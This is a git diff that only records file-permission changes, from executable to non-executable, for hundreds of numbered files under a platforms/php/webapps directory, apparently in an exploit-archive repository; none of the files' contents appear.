mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7435.txt b/platforms/php/webapps/7435.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7437.txt b/platforms/php/webapps/7437.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7439.txt b/platforms/php/webapps/7439.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7441.txt b/platforms/php/webapps/7441.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7443.txt b/platforms/php/webapps/7443.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7444.txt b/platforms/php/webapps/7444.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7448.txt b/platforms/php/webapps/7448.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7449.txt b/platforms/php/webapps/7449.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7451.txt b/platforms/php/webapps/7451.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7453.txt b/platforms/php/webapps/7453.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7455.txt b/platforms/php/webapps/7455.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7456.txt b/platforms/php/webapps/7456.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7457.txt b/platforms/php/webapps/7457.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7458.txt b/platforms/php/webapps/7458.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7459.txt b/platforms/php/webapps/7459.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7461.txt b/platforms/php/webapps/7461.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7463.txt b/platforms/php/webapps/7463.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7465.txt b/platforms/php/webapps/7465.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7473.php b/platforms/php/webapps/7473.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7474.txt b/platforms/php/webapps/7474.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7475.txt b/platforms/php/webapps/7475.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7476.txt b/platforms/php/webapps/7476.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7478.txt b/platforms/php/webapps/7478.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7479.txt b/platforms/php/webapps/7479.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7480.txt b/platforms/php/webapps/7480.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7481.txt b/platforms/php/webapps/7481.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7482.txt b/platforms/php/webapps/7482.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7483.txt b/platforms/php/webapps/7483.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7487.txt b/platforms/php/webapps/7487.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7490.php b/platforms/php/webapps/7490.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7493.txt b/platforms/php/webapps/7493.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7494.txt b/platforms/php/webapps/7494.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7497.txt b/platforms/php/webapps/7497.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7500.txt b/platforms/php/webapps/7500.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7502.txt b/platforms/php/webapps/7502.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7504.txt b/platforms/php/webapps/7504.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7506.txt b/platforms/php/webapps/7506.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7509.txt b/platforms/php/webapps/7509.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7510.txt b/platforms/php/webapps/7510.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7511.txt b/platforms/php/webapps/7511.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7512.php b/platforms/php/webapps/7512.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7513.txt b/platforms/php/webapps/7513.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7514.txt b/platforms/php/webapps/7514.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7515.txt b/platforms/php/webapps/7515.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7517.txt b/platforms/php/webapps/7517.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7518.txt b/platforms/php/webapps/7518.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7519.txt b/platforms/php/webapps/7519.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7523.php b/platforms/php/webapps/7523.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7524.txt b/platforms/php/webapps/7524.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7525.txt b/platforms/php/webapps/7525.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7526.txt b/platforms/php/webapps/7526.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7527.txt b/platforms/php/webapps/7527.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7529.txt b/platforms/php/webapps/7529.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7531.txt b/platforms/php/webapps/7531.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7532.txt b/platforms/php/webapps/7532.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7537.txt b/platforms/php/webapps/7537.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7538.txt b/platforms/php/webapps/7538.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7539.txt b/platforms/php/webapps/7539.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7540.txt b/platforms/php/webapps/7540.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7542.txt b/platforms/php/webapps/7542.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7543.txt b/platforms/php/webapps/7543.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7544.txt b/platforms/php/webapps/7544.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7545.txt b/platforms/php/webapps/7545.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7546.txt b/platforms/php/webapps/7546.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7548.php b/platforms/php/webapps/7548.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7549.txt b/platforms/php/webapps/7549.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7551.txt b/platforms/php/webapps/7551.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7552.txt b/platforms/php/webapps/7552.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7557.txt b/platforms/php/webapps/7557.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7558.txt b/platforms/php/webapps/7558.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7559.php b/platforms/php/webapps/7559.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7560.txt b/platforms/php/webapps/7560.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7561.txt b/platforms/php/webapps/7561.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7562.txt b/platforms/php/webapps/7562.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7563.txt b/platforms/php/webapps/7563.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7565.txt b/platforms/php/webapps/7565.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7567.txt b/platforms/php/webapps/7567.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7568.txt b/platforms/php/webapps/7568.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7569.txt b/platforms/php/webapps/7569.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7570.txt b/platforms/php/webapps/7570.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7572.txt b/platforms/php/webapps/7572.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7573.txt b/platforms/php/webapps/7573.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7574.txt b/platforms/php/webapps/7574.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7579.txt b/platforms/php/webapps/7579.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7580.txt b/platforms/php/webapps/7580.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7586.txt b/platforms/php/webapps/7586.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7587.txt b/platforms/php/webapps/7587.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7595.txt b/platforms/php/webapps/7595.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7596.txt b/platforms/php/webapps/7596.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7597.txt b/platforms/php/webapps/7597.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7598.txt b/platforms/php/webapps/7598.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7601.txt b/platforms/php/webapps/7601.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7602.txt b/platforms/php/webapps/7602.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7603.txt b/platforms/php/webapps/7603.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7604.txt b/platforms/php/webapps/7604.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7605.php b/platforms/php/webapps/7605.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7606.txt b/platforms/php/webapps/7606.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7611.php b/platforms/php/webapps/7611.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7612.txt b/platforms/php/webapps/7612.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7614.txt b/platforms/php/webapps/7614.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7615.txt b/platforms/php/webapps/7615.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7616.txt b/platforms/php/webapps/7616.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7619.txt b/platforms/php/webapps/7619.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7620.txt b/platforms/php/webapps/7620.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7621.txt b/platforms/php/webapps/7621.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7622.txt b/platforms/php/webapps/7622.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7624.txt b/platforms/php/webapps/7624.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7625.txt b/platforms/php/webapps/7625.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7626.txt b/platforms/php/webapps/7626.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7628.txt b/platforms/php/webapps/7628.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7629.txt b/platforms/php/webapps/7629.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7631.txt b/platforms/php/webapps/7631.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7633.txt b/platforms/php/webapps/7633.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7635.txt b/platforms/php/webapps/7635.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7638.txt b/platforms/php/webapps/7638.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7639.txt b/platforms/php/webapps/7639.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7640.txt b/platforms/php/webapps/7640.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7641.txt b/platforms/php/webapps/7641.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7642.txt b/platforms/php/webapps/7642.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7644.txt b/platforms/php/webapps/7644.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7645.txt b/platforms/php/webapps/7645.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7648.txt b/platforms/php/webapps/7648.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7650.php b/platforms/php/webapps/7650.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7653.txt b/platforms/php/webapps/7653.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7657.txt b/platforms/php/webapps/7657.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7659.txt b/platforms/php/webapps/7659.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7660.txt b/platforms/php/webapps/7660.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7663.txt b/platforms/php/webapps/7663.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7667.txt b/platforms/php/webapps/7667.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7672.txt b/platforms/php/webapps/7672.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7674.txt b/platforms/php/webapps/7674.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7678.txt b/platforms/php/webapps/7678.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7679.php b/platforms/php/webapps/7679.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7680.txt b/platforms/php/webapps/7680.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7682.txt b/platforms/php/webapps/7682.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7686.txt b/platforms/php/webapps/7686.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7687.txt b/platforms/php/webapps/7687.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7689.txt b/platforms/php/webapps/7689.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7690.txt b/platforms/php/webapps/7690.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7691.php b/platforms/php/webapps/7691.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7697.txt b/platforms/php/webapps/7697.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7698.txt b/platforms/php/webapps/7698.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7699.txt b/platforms/php/webapps/7699.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7700.php b/platforms/php/webapps/7700.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7703.txt b/platforms/php/webapps/7703.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7711.txt b/platforms/php/webapps/7711.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7718.txt b/platforms/php/webapps/7718.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7719.txt b/platforms/php/webapps/7719.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7722.txt b/platforms/php/webapps/7722.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7723.txt b/platforms/php/webapps/7723.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7724.php b/platforms/php/webapps/7724.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7725.txt b/platforms/php/webapps/7725.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7726.txt b/platforms/php/webapps/7726.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7728.txt b/platforms/php/webapps/7728.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7729.txt b/platforms/php/webapps/7729.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7730.txt b/platforms/php/webapps/7730.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7731.txt b/platforms/php/webapps/7731.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7732.php b/platforms/php/webapps/7732.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7733.txt b/platforms/php/webapps/7733.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7734.txt b/platforms/php/webapps/7734.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7738.txt b/platforms/php/webapps/7738.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7740.txt b/platforms/php/webapps/7740.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7743.txt b/platforms/php/webapps/7743.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7746.txt b/platforms/php/webapps/7746.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7758.txt b/platforms/php/webapps/7758.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7759.txt b/platforms/php/webapps/7759.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7764.txt b/platforms/php/webapps/7764.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7775.txt b/platforms/php/webapps/7775.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7777.txt b/platforms/php/webapps/7777.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7778.txt b/platforms/php/webapps/7778.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7786.txt b/platforms/php/webapps/7786.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7787.txt b/platforms/php/webapps/7787.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7792.txt b/platforms/php/webapps/7792.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7793.php b/platforms/php/webapps/7793.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7795.txt b/platforms/php/webapps/7795.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7796.txt b/platforms/php/webapps/7796.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7797.php b/platforms/php/webapps/7797.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7798.txt b/platforms/php/webapps/7798.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7805.txt b/platforms/php/webapps/7805.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7806.txt b/platforms/php/webapps/7806.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7809.txt b/platforms/php/webapps/7809.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7810.txt b/platforms/php/webapps/7810.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7811.txt b/platforms/php/webapps/7811.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7813.txt b/platforms/php/webapps/7813.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7814.txt b/platforms/php/webapps/7814.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7815.txt b/platforms/php/webapps/7815.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7817.txt b/platforms/php/webapps/7817.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7818.txt b/platforms/php/webapps/7818.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7819.txt b/platforms/php/webapps/7819.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7828.txt b/platforms/php/webapps/7828.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7829.txt b/platforms/php/webapps/7829.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7830.txt b/platforms/php/webapps/7830.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7831.txt b/platforms/php/webapps/7831.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7832.txt b/platforms/php/webapps/7832.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7833.php b/platforms/php/webapps/7833.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7834.txt b/platforms/php/webapps/7834.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7835.htm b/platforms/php/webapps/7835.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7836.txt b/platforms/php/webapps/7836.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7838.txt b/platforms/php/webapps/7838.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7841.txt b/platforms/php/webapps/7841.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7846.php b/platforms/php/webapps/7846.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7847.txt b/platforms/php/webapps/7847.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7849.txt b/platforms/php/webapps/7849.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7851.php b/platforms/php/webapps/7851.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7860.php b/platforms/php/webapps/7860.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7862.txt b/platforms/php/webapps/7862.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7863.txt b/platforms/php/webapps/7863.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7866.txt b/platforms/php/webapps/7866.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7867.php b/platforms/php/webapps/7867.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7873.txt b/platforms/php/webapps/7873.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7874.txt b/platforms/php/webapps/7874.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7876.php b/platforms/php/webapps/7876.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7877.txt b/platforms/php/webapps/7877.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7878.txt b/platforms/php/webapps/7878.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7880.txt b/platforms/php/webapps/7880.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7881.txt b/platforms/php/webapps/7881.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7883.txt b/platforms/php/webapps/7883.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7884.txt b/platforms/php/webapps/7884.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7885.txt b/platforms/php/webapps/7885.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7886.txt b/platforms/php/webapps/7886.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7892.php b/platforms/php/webapps/7892.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7893.txt b/platforms/php/webapps/7893.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7894.txt b/platforms/php/webapps/7894.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7895.txt b/platforms/php/webapps/7895.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7896.php b/platforms/php/webapps/7896.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7897.php b/platforms/php/webapps/7897.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7898.txt b/platforms/php/webapps/7898.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7899.txt b/platforms/php/webapps/7899.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7900.txt b/platforms/php/webapps/7900.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7908.txt b/platforms/php/webapps/7908.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7909.txt b/platforms/php/webapps/7909.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7911.txt b/platforms/php/webapps/7911.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7916.txt b/platforms/php/webapps/7916.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7917.php b/platforms/php/webapps/7917.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7922.txt b/platforms/php/webapps/7922.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7925.txt b/platforms/php/webapps/7925.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7927.txt b/platforms/php/webapps/7927.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7930.txt b/platforms/php/webapps/7930.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7931.txt b/platforms/php/webapps/7931.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7932.txt b/platforms/php/webapps/7932.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7933.txt b/platforms/php/webapps/7933.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7936.txt b/platforms/php/webapps/7936.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7938.txt b/platforms/php/webapps/7938.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7939.txt b/platforms/php/webapps/7939.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7940.txt b/platforms/php/webapps/7940.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7941.txt b/platforms/php/webapps/7941.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7944.php b/platforms/php/webapps/7944.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7945.php b/platforms/php/webapps/7945.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7946.txt b/platforms/php/webapps/7946.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7948.php b/platforms/php/webapps/7948.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7951.txt b/platforms/php/webapps/7951.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7952.txt b/platforms/php/webapps/7952.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7953.txt b/platforms/php/webapps/7953.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7954.txt b/platforms/php/webapps/7954.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7955.txt b/platforms/php/webapps/7955.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7956.txt b/platforms/php/webapps/7956.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7959.txt b/platforms/php/webapps/7959.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7960.txt b/platforms/php/webapps/7960.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7961.php b/platforms/php/webapps/7961.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7964.txt b/platforms/php/webapps/7964.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7965.txt b/platforms/php/webapps/7965.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7968.php b/platforms/php/webapps/7968.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7969.txt b/platforms/php/webapps/7969.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7976.txt b/platforms/php/webapps/7976.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7977.txt b/platforms/php/webapps/7977.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7978.txt b/platforms/php/webapps/7978.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7979.txt b/platforms/php/webapps/7979.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7987.txt b/platforms/php/webapps/7987.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7992.txt b/platforms/php/webapps/7992.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7993.txt b/platforms/php/webapps/7993.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7996.txt b/platforms/php/webapps/7996.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7997.htm b/platforms/php/webapps/7997.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/7998.txt b/platforms/php/webapps/7998.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/800.txt b/platforms/php/webapps/800.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8000.txt b/platforms/php/webapps/8000.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8001.txt b/platforms/php/webapps/8001.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8002.txt b/platforms/php/webapps/8002.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8004.txt b/platforms/php/webapps/8004.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8005.txt b/platforms/php/webapps/8005.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8006.txt b/platforms/php/webapps/8006.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8007.php b/platforms/php/webapps/8007.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/801.c b/platforms/php/webapps/801.c old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8011.txt b/platforms/php/webapps/8011.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8012.txt b/platforms/php/webapps/8012.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8016.txt b/platforms/php/webapps/8016.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8017.txt b/platforms/php/webapps/8017.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8018.txt b/platforms/php/webapps/8018.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8019.txt b/platforms/php/webapps/8019.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8020.txt b/platforms/php/webapps/8020.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8025.txt 